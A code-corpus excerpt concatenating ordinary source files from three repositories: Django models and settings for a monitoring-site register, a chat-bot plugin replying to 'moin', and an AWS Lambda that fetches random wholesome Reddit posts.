#GEOS_LIBRARY_PATH = '/app/.heroku/vendor/lib/libgeos_c.so' if os.environ.get('ENV') == 'HEROKU' else os.getenv('GEOS_LIBRARY_PATH')
#GDAL_LIBRARY_PATH = '/app/.heroku/vendor/lib/libgdal.so' if os.environ.get('ENV') == 'HEROKU' else os.getenv('GDAL_LIBRARY_PATH')
# Leaflet Configurations
LEAFLET_CONFIG = {
'DEFAULT_CENTER': (-41.2706, 173.2840),
'DEFAULT_ZOOM': 5,
'MAX_ZOOM': 20,
'MIN_ZOOM':3,
'SCALE': 'both',
'ATTRIBUTION_PREFIX': 'Inspired by Life in GIS'
}
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend', # this is default
'guardian.backends.ObjectPermissionBackend',
)
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
],
'DEFAULT_FILTER_BACKENDS': [
'django_filters.rest_framework.DjangoFilterBackend'
],
#'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',
#'DEFAULT_RENDERER_CLASSES': [
# 'rest_framework.renderers.JSONRenderer',
# 'rest_framework.renderers.AdminRenderer',
# 'rest_framework.renderers.TemplateHTMLRenderer',
#]
}
# Configure Django App for Heroku.
django_heroku.settings(locals())
DATABASES['default']['ENGINE'] = 'django.contrib.gis.db.backends.postgis'
```
#### File: mon-site-register/sites/models.py
```python
from django.contrib.gis.db import models
#from django.dispatch import receiver
from django.contrib.auth.models import User, Group
from django.db.models.signals import post_save
from django.dispatch import receiver
#from guardian.shortcuts import assign_perm
class ApiInfo(models.Model):
title = models.CharField(max_length=200)
description = models.TextField()
def __str__(self):
return self.title
class ApiConformance(models.Model):
api_id = models.ForeignKey(ApiInfo, on_delete=models.CASCADE, default=1)
name = models.CharField(max_length=100)
url = models.URLField()
def __str__(self):
return self.name
class ApiCollections(models.Model):
id = models.CharField(max_length=100, primary_key=True)
api_id = models.ForeignKey(ApiInfo, on_delete=models.CASCADE)
title = models.CharField(max_length=200)
description = models.TextField()
def __str__(self):
return self.id
class Agency(models.Model):
agency_name = models.CharField(max_length=200, unique=True)
website = models.CharField(max_length=200)
#site_webservices = models.ForeignKey('AgencySiteListServices', null=True, blank=True, on_delete=models.CASCADE, related_name='agency_site_lists')
def __str__(self):
return self.agency_name
class IdentifierType(models.Model):
identifier_name = models.CharField(max_length=200, unique=True)
def __str__(self):
return self.identifier_name
class Site(models.Model):
site_name = models.CharField(max_length=200)
location = models.PointField('site location', null=True, blank=True, srid=4326)
description = models.CharField(max_length=500, null=True, blank=True)
identifiers = models.ManyToManyField(IdentifierType, null=True, through='SiteIdentifiers')
agencies = models.ManyToManyField(Agency, null=True, through='SiteAgency')
#operational_periods = models.ForeignKey('SiteOperation', null=True, on_delete=models.CASCADE, related_name='site_operating')
# need to add a feature of interest, but how define???
class Meta:
ordering = ['pk']
def __str__(self):
return self.site_name
class SiteAgency(models.Model):
# Check / work through the on delete actions
site = models.ForeignKey(Site, on_delete=models.CASCADE)#, related_name='site_agencies')
agency = models.ForeignKey(Agency, on_delete=models.CASCADE, null=True)#, related_name='agency_to_site')
from_date = models.DateTimeField('agency from date', null=True, blank=True)
to_date = models.DateTimeField('agency to date', null=True, blank=True)
#def __str__(self):
# return self.agency_name
class Meta:
constraints = [
models.UniqueConstraint(fields=['site', 'agency'], name='unique site agency')
]
def __str__(self):
return "%s - %s" % (self.agency.agency_name, self.site.site_name)
class ObservedProperty(models.Model):
observed_property_name = models.CharField(max_length=200, unique=True)
observed_property_url = models.CharField(max_length=400, null=True, blank=True)
def __str__(self):
return self.observed_property_name
class InterpolationType(models.Model):
interpolation_type_name = models.CharField(max_length=200, unique=True)
interpolation_type_url = models.CharField(max_length=400, null=True, blank=True)
def __str__(self):
return self.interpolation_type_name
class AgencyMeasurement(models.Model):
agency = models.ForeignKey(Agency, on_delete=models.CASCADE)
agency_measurement_name = models.CharField(max_length=200)
measurement_description = models.CharField(max_length=500, null=True, blank=True)
interpolation_type = models.ForeignKey(InterpolationType, on_delete=models.CASCADE, null=True, blank=True)
observed_property = models.ForeignKey(ObservedProperty, on_delete=models.CASCADE)
# Add units, statistics, type of measurement
class Meta:
constraints = [
models.UniqueConstraint(fields=['agency', 'agency_measurement_name'], name='unique agency measurements')
]
def __str__(self):
return "%s - %s " %(self.agency.agency_name, self.agency_measurement_name)
class SiteAgencyMeasurement(models.Model):
site_agency = models.ForeignKey(SiteAgency, on_delete=models.CASCADE)
agency_measurement = models.ForeignKey(AgencyMeasurement, on_delete=models.CASCADE)
result_url = models.CharField(max_length=400)
observed_from = models.DateTimeField('site agency measurement from date', null=True, blank=True)
observed_to = models.DateTimeField('site agency measurement to date', null=True, blank=True)
class Meta:
constraints = [
models.UniqueConstraint(fields=['site_agency', 'agency_measurement'], name='unique site agency measurement')
]
#class SiteOperation(models.Model):
# site = models.ForeignKey(Site, on_delete=models.SET_NULL, null=True)
# from_date = models.DateField('operational from date')
# to_date = models.DateField('operational to date', null=True, blank=True)
#def __str__(self):
# return self.from_date
class SiteIdentifiers(models.Model):
site = models.ForeignKey(Site, on_delete=models.CASCADE)#, related_name='site_idents') #site_to_ident_type
identifier_type = models.ForeignKey(IdentifierType, on_delete=models.CASCADE, null=True)#, related_name='site_ident') #ident_type_to_site
#identifier_type = models.OneToOneField(IdentifierType, on_delete=models.SET_NULL, related_name='ident_site', null=True) #ident_type_to_site
identifier = models.CharField(max_length=200)
class Meta:
constraints = [
models.UniqueConstraint(fields=['identifier_type', 'identifier'], name='unique other identifiers')
]
#def __str__(self):
# return self.identifier_type
#class AgencySiteListServices(models.Model):
# agency = models.ForeignKey(Agency, on_delete=models.CASCADE)
# service_type = models.ForeignKey('SiteServiceTypes', on_delete=models.CASCADE, related_name='site_service_types')
# service_url = models.CharField(max_length=250)
class SiteServiceTypes(models.Model):
service_type = models.CharField(max_length=50)
#@receiver(post_save, sender=Agency)
#def create_agency_group(sender, instance, created, **kwargs):
# if created:
# newgroup = Group.objects.create(name=instance.agency_name)
# newgroup.save()
# assign_perm('change_agency', newgroup, newgroup)
```
#### File: mon-site-register/sites/pagination.py
```python
from collections import OrderedDict
from rest_framework import pagination
from rest_framework.response import Response
class OGCFeaturesPagination(pagination.LimitOffsetPagination):
"""
A geoJSON implementation of a pagination serializer.
Modified from the Django Rest GIS GeoJsonPagination
to conform with OGC Features specification.
"""
def get_paginated_response(self, data):
# define additional pagination links
pagination_links = [{
'href':self.get_next_link(),
'rel': 'next',
'type': 'application/geo+json',
'title': 'next page'
},
{
'href':self.get_previous_link(),
'rel': 'prev',
'type': 'application/geo+json',
'title': 'previous page'
}]
# create final links list by adding pagination links to existing
final_links = data['links'] + pagination_links
return Response(OrderedDict([
('type', 'FeatureCollection'),
('numberMatched', self.count),
('numberReturned', len(data['features'])),
('links', final_links),
('features', data['features'])
]))
```
|
{
"source": "jeffcorcoran/fraqbot",
"score": 2
}
|
#### File: fraqbot/Local/moin.py
```python
import logging
import os
import sys
import time
from Legobot.Lego import Lego
LOCAL_DIR = os.path.join(os.path.abspath(os.path.dirname(__file__)))
if LOCAL_DIR not in sys.path:
sys.path.append(LOCAL_DIR)
from helpers import call_rest_api # noqa #402
logger = logging.getLogger(__name__)
class Moin(Lego):
def __init__(self, baseplate, lock, *args, **kwargs):
super().__init__(baseplate, lock, acl=kwargs.get('acl'))
self.url_base = kwargs.get('url_base')
self.api_base = kwargs.get('api_base')
self.rate_map = {}
def _get_user_moin(self, user):
url = f'{self.api_base}/{user}'
f_name = call_rest_api(__name__, 'get', url, response='json')
if f_name:
return f'{self.url_base}{f_name}'
else:
return None
def _check_rate(self, source_user):
if not source_user:
return False
now = int(time.time())
last = self.rate_map.get(source_user, 0)
if now - last >= 300:
self.rate_map[source_user] = now
return True
return False
def listening_for(self, message):
return 'moin' in str(message.get('text', '')).lower()
def handle(self, message):
source_user = message.get('metadata', {}).get('source_user', '')
logger.debug(f'HANDLING MOIN for {source_user}')
check = self._check_rate(source_user)
logger.debug(f'CHECK RATE for {source_user}: {check}')
if check:
moin = self._get_user_moin(source_user)
if moin:
opts = self.build_reply_opts(message)
self.reply_attachment(message, 'moin', moin, opts=opts)
def get_name(self):
return ''
```
|
{
"source": "jeffcorpuz/wholesomify",
"score": 3
}
|
#### File: jeffcorpuz/wholesomify/lambda_function.py
```python
import json
import os
import praw
from typing import Generator
from random import randrange
env = {
'username': os.environ["REDDITNAME"],
'password': os.environ.get("PASSWORD",""), # for testing purposes, password is blank...
'id': os.environ["APPID"],
'secret': os.environ["APPSECRET"],
'app-name': os.environ["APPNAME"],
'limit': os.environ["LIMIT"],
}
reddit = praw.Reddit(client_id=env['id'],
client_secret=env['secret'],
user_agent=f"{env['app-name']} by {env['username']}",
username=env['username'],
password=env['password'],
)
def wholesomify(limit: int) -> Generator:
# assume you have a Reddit instance bound to variable `reddit`
choice = ["wholesomememes", "aww", "EyeBleach"]
subreddit = reddit.subreddit(choice[randrange(len(choice))])
submissions = []
# populate
for submission in subreddit.hot(limit=limit):
submissions.append(submission)
return submissions[randrange(limit)]
def lambda_handler(event, context):
submission = wholesomify(int(env['limit']))
message = f"wholesome time!: {submission.url}"
return {
'statusCode': 200,
'body': json.dumps(message)
}
```
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.